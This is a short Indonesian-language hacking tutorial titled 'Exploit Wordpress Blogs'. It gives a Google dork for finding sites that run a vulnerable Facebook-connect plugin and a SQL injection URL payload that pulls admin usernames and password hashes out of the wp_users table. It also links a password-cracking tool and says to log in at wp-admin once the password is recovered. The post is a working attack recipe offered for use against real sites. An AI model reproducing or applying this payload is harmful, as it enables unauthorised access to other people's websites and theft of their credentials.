Exploit Wordpress Blogs

Dork: inurl:"fbconnect_action=myhome"

Exploit: ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled24.JPG]

Klik situs Targetnya

[Image: untitled22.JPG]

Sekarang ubah URL :
?fbconnect_action=myhome&userid=

Dengan EXPLOIT ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Sekarang keluar Username dan Password Admin.

Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
http://www.easy-share.com/1917245768/passwordspro.zip

Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php

TararararaTara Masuk Deh :D

Andrian21

Exploit Wordpress Blogs

Baca Juga Gan !